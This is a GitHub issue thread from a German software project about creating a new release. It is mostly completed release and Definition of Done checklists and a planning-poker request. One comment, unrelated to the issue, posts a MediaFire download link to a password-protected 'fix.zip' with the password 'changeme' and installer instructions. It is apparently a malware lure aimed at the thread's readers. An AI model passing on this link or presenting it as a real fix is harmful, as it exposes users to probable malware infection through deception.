### ISSUE TITLE
[Code] - Neuen Release erstellen

### ISSUE THREAD

**Issue by splican** [ProjektAdLer/2D_3D_AdLer#1057]
**Akzeptanzkriterien**

- [x] Alle haben ihre Änderungen in Changelog geschrieben oder überprüft, ob sie bereits drin stehen
- [x] Changelog Marius
- [x] Changelog Felix
- [x] Changelog Lukas
- [x] Changelog Daniel
- [x] Changelog Niklas
- [x] Changelog Philipp
- [x] Neuer Release ist erstellt

**Definition of Ready**

- [x] User Story ist klein genug für Sprint
- [x] User Story ist für jeden beteiligten Entwickler klar verständlich
- [x] User Story Aufwand ist geschätzt
- [x] User Story hat Akzeptanzkriterien

**Definition of Done**

- [x] Requirements sind erstellt/angepasst und auf Writerside dokumentiert
- [x] Alle Akzeptanzkriterien sind erfüllt
- [x] Die Implementierung ist gepusht
- [x] Eine Code Review wurde durchgeführt (oder in Paired Programming gearbeitet)
- [x] Unittests sind erstellt
- [x] Alle Tests müssen bestanden sein
- [x] Benutzerdokumentation wurde angelegt oder angepasst (Writerside)
- [x] Changelog des jeweiligen Release wurde aktualisiert
- [x] Es gibt keine bekannten Bugs oder für Bug wurde Issue erstellt
- [x] Die Realisierung der User Story wurde erfolgreich durch den Product Owner abgenommen
- [x] [Optional] Dokumentation des Vorgehens oder externer Quellen wurde angelegt (Zenhub Kommentar)
- [x] [Optional] UML Aktivitätsdiagramm wurde erstellt bzw. aktualisiert

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by splican** [comment]
Hey team! Please [add your planning poker estimate](https://app.zenhub.com/workspaces/2D3DAdLerWorkspace-61b878c8596aef0010898ddd/issues/ProjektAdLer/2D_3D_AdLer/1057?planning-poker) with Zenhub @AdLer-Lukas @DerKatsche @Grunick @mountler @Lizardguard
